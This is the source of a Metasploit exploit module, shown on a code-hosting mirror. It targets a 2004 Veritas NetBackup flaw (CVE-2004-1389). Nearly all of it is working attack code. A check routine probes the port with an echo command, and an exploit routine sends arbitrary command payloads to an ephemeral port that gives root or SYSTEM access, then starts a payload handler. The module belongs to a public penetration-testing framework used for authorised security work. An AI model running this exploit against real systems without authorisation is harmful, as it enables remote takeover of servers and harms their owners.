Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'VERITAS NetBackup Remote Command Execution',

16
        'Description' => %q{

17
          This module allows arbitrary command execution on an

18
          ephemeral port opened by Veritas NetBackup, whilst an

19
          administrator is authenticated. The port is opened and

20
          allows direct console access as root or SYSTEM from

21
          any source address.

22
        },

23
        'Author' => [ 'aushack' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2004-1389' ],

27
          [ 'OSVDB', '11026' ],

28
          [ 'BID', '11494' ]

29
        ],

30
        'Privileged' => true,

31
        'Platform' => %w{linux unix win},

32
        'Arch' => ARCH_CMD,

33
        'Payload' => {

34
          'Space' => 1024,

35
          'BadChars' => '',

36
          'DisableNops' => true,

37
          'Compat' =>

38
                        {

39
                          'PayloadType' => 'cmd',

40
                          'RequiredCmd' => 'generic perl telnet',

41
                        }

42
        },

43
        'Targets' => [

44
          ['Automatic', {}],

45
        ],

46
        'DisclosureDate' => '2004-10-21',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55
  end

56


57
  def check

58
    connect

59


60
    sploit = rand_text_alphanumeric(10)

61
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

62


63
    sock.put(buf)

64
    banner = sock.get_once

65


66
    disconnect

67


68
    if banner.to_s.index(sploit)

69
      return Exploit::CheckCode::Vulnerable

70
    end

71


72
    return Exploit::CheckCode::Safe

73
  end

74


75
  def exploit

76
    connect

77


78
    sploit = payload.encoded.split(" ")

79


80
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"

81
    buf << payload.encoded

82
    buf << "\n"

83


84
    sock.put(buf)

85
    res = sock.get_once

86


87
    print_status(res.to_s)

88


89
    handler

90
    disconnect

91
  end

92
end

93


94